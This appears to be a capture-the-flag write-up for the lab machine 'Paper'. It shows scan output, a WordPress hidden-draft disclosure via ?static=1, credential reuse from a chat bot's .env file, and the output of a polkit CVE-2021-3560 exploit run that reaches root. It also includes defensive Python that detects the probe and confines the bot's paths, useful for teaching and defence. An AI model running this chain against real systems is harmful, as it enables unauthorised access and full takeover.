$ nmap -sV -sC -PN -oA paper_nmap -p- 10.10.11.143
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-10 08:47 CEST
Nmap scan report for 10.10.11.143
Host is up (0.071s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| http-methods:
|_ Potentially risky methods: TRACE
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| tls-alpn:
|_ http/1.1
| http-methods:
|_ Potentially risky methods: TRACE
No common UDP-based services were found.
The web server on ports 80 and 443 serves only a generic HTTP server test page with no content.
Fuzzed for additional subdirectories and found a manual directory containing a local copy of the Apache manual.
There isn't much to go on in the manual subdirectory, as it appears to be a standard copy of the official documentation.
Ran a vulnerability scan with nikto, which revealed a backend server hostname:
$ nikto -h paper.htb -o output.txt
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.11.143
+ Target Hostname: paper.htb
+ Target Port: 80
+ Start Time: 2025-07-10 09:21:02 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Uncommon header 'x-backend-server' found, with contents: office.paper.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /OA81iZS5.php: Retrieved x-powered-by header: PHP/7.2.24.
+ mod_fcgid/2.3.9 appears to be outdated (current is at least 2.3.10-dev).
+ OpenSSL/1.1.1k appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ Apache/2.4.37 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: OPTIONS, HEAD, GET, POST, TRACE .
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /manual/: Web server manual found.
+ /icons/: Directory indexing found.
+ /manual/images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8769 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2025-07-10 09:25:18 (GMT2) (256 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The x-backend-server header points to a backend server (office.paper) that differs from the main one. It can be reached by resolving that hostname to the target IP address.
Navigated to office.paper and found the backend site.
The backend server is running a WordPress blog. A comment on one of the blog posts hints at a secret draft.
Searched for the generator meta tag in the page source and found that the site is running WordPress 5.2.3.
This version of WordPress is vulnerable to unauthenticated disclosure of hidden content (CVE-2019-17671). The vulnerability is triggered by appending ?static=1 to the WordPress index.php URL. Doing so reveals Prisonmike's hidden draft:
test
Micheal please remove the secret from drafts for gods sake!
Hello employees of Blunder Tiffin,
Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system.
So, I kindly request you all to take your discussions from the public blog to a more private chat system.
-Nick
Warning for Michael
Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick
Threat Level Midnight
A MOTION PICTURE SCREENPLAY,
WRITTEN AND DIRECTED BY
MICHAEL SCOTT
[INT:DAY]
Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt….
Secret Registration URL of new Employee chat system
I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.
Also, stop looking at my drafts. Jeez!
The URL in the post points to the registration page for a Rocket.Chat instance.
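From the defender's side, the CVE-2019-17671 probe described above is easy to spot in the Apache access log: every request carrying a static=1 query parameter to a WordPress front-end URL. The following is an added example, not code from this write-up; the log lines are constructed samples in Apache's default combined format, not the target's logs.

```python
import re
import posixpath
from urllib.parse import urlsplit, parse_qs

# Leading fields of the Apache/NCSA combined log format (referer/UA are ignored).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

def parse_line(line):
    """Return a dict of fields plus the split path/query, or None on a non-matching line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec

def is_static_draft_probe(rec):
    """CVE-2019-17671 is triggered by ?static=1 on the WordPress front end."""
    if "1" not in rec["query"].get("static", []):
        return False
    # WordPress routes every front-end permalink through index.php; skip static assets.
    ext = posixpath.splitext(rec["path"])[1]
    return ext in ("", ".php")

def scan(lines):
    """Return (client ip, request target, status) for each probe found."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and is_static_draft_probe(rec):
            hits.append((rec["ip"], rec["target"], rec["status"]))
    return hits

# Constructed sample log lines (not from the target).
SAMPLE_LOG = """\
10.10.14.5 - - [10/Jul/2025:09:30:01 +0200] "GET / HTTP/1.1" 200 5123
10.10.14.5 - - [10/Jul/2025:09:30:05 +0200] "GET /?static=1 HTTP/1.1" 200 18822
10.10.14.9 - - [10/Jul/2025:09:31:12 +0200] "GET /index.php?static=1&order=asc HTTP/1.1" 200 18822
10.10.14.5 - - [10/Jul/2025:09:32:40 +0200] "GET /wp-content/uploads/static=1.png HTTP/1.1" 404 196
10.10.14.7 - - [10/Jul/2025:09:33:00 +0200] "GET /manual/ HTTP/1.1" 200 1240
""".splitlines()

if __name__ == "__main__":
    for ip, target, status in scan(SAMPLE_LOG):
        print(f"CVE-2019-17671 probe from {ip}: {target} -> {status}")
```

A 200 on such a request from an unpatched 5.2.x site is the signal to patch (5.2.4 fixed it) and to review which drafts were exposed.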
Exploitation
Registered an account and accessed the company chat server. There is a single channel available, #general. According to the existing conversation, there is a bot available that can be used to read local files:
Although #general is set to read-only mode, the bot (recyclops) can be interacted with by messaging it directly:
The bot is essentially a wrapper around OS commands and will list the contents of any path without restriction:
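The fix for a bot like this is to confine every requested path to an allowed root (resolving symlinks and .. before checking) and to list directories with library calls rather than by passing the string to a shell. The following is an added illustration, not the chat bot's own code; the root directory and file names are constructed in a temporary directory for the demo.

```python
import os
import tempfile

class PathNotAllowed(Exception):
    pass

def resolve_within(root, requested):
    """Resolve `requested` under `root`; refuse anything that escapes it.
    realpath() collapses '..' and follows symlinks, so the containment check
    is made on the final on-disk location, not the string the user typed."""
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, requested.lstrip("/")))
    if candidate != root_real and not candidate.startswith(root_real + os.sep):
        raise PathNotAllowed(requested)
    return candidate

def list_dir(root, requested="."):
    """Hardened replacement for 'ls <user input>': no shell, no escape from root."""
    target = resolve_within(root, requested)
    if not os.path.isdir(target):
        raise PathNotAllowed(requested)
    return sorted(entry.name for entry in os.scandir(target))

def demo():
    """Constructed sandbox: one allowed subdirectory and a symlink pointing outside."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "sales"))
        open(os.path.join(root, "sales", "q1.txt"), "w").close()
        os.symlink("/etc", os.path.join(root, "etc_link"))
        results = {}
        for req in ["sales", "../../etc", "/etc/passwd", "etc_link"]:
            try:
                results[req] = list_dir(root, req)
            except PathNotAllowed:
                results[req] = "denied"
        return results

if __name__ == "__main__":
    for req, outcome in demo().items():
        print(f"{req!r}: {outcome}")
```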
Looked around inside user dwight's home directory and found the configuration file for the chat bot in ~/hubot/.env:
Used the password in the .env file to connect to the target over SSH as user dwight.
Got the user flag.
Privilege Escalation
User dwight has no sudo privileges, nor are they a member of any privileged group. There don't seem to be any custom binaries or useful directories to which dwight has write access.
There is one additional user account on the target, rocketchat, which sounds like a service account for Rocket.Chat. However, this is also a regular non-privileged account. The account does have full access to the Rocket.Chat program directory (/opt/Rocket.Chat), but that is unlikely to help with escalating privileges.
With no obvious privilege escalation routes to go after, a good next step is to run LinPEAS:
[dwight@paper ~]$ ./linpeas.sh
...
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
...
Vulnerable to CVE-2021-3560
...
The vulnerability suggested by LinPEAS (CVE-2021-3560) is a privilege escalation vulnerability in polkit. Exploiting it requires precise timing: two requests must be sent to polkit within a short window. As this is a relatively old vulnerability, there are plenty of PoCs available that automate the process, such as this one.
Downloaded the PoC script from the GitHub repository above and ran it:
[dwight@paper ~]$ ./poc.sh
[!] Username set as : secnigma
[!] No Custom Timing specified.
[!] Timing will be detected Automatically
[!] Force flag not set.
[!] Vulnerability checking is ENABLED!
[!] Starting Vulnerability Checks...
[!] Checking distribution...
[!] Detected Linux distribution as "centos"
[!] Checking if Accountsservice and Gnome-Control-Center is installed
[+] Accounts service and Gnome-Control-Center Installation Found!!
[!] Checking if polkit version is vulnerable
[+] Polkit version appears to be vulnerable!!
[!] Starting exploit...
[!] Inserting Username secnigma...
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
[+] Inserted Username secnigma with UID 1005!
[!] Inserting password hash...
[!] It looks like the password insertion was succesful!
[!] Try to login as the injected user using su - secnigma
[!] When prompted for password, enter your password
[!] If the username is inserted, but the login fails; try running the exploit again.
[!] If the login was succesful,simply enter 'sudo bash' and drop into a root shell!
[dwight@paper ~]$ su - secnigma
Password:
[secnigma@paper ~]$ id
uid=1005(secnigma) gid=1005(secnigma) groups=1005(secnigma),10(wheel)
[secnigma@paper ~]$ sudo bash
[sudo] password for secnigma:
[root@paper secnigma]# id
uid=0(root) gid=0(root) groups=0(root)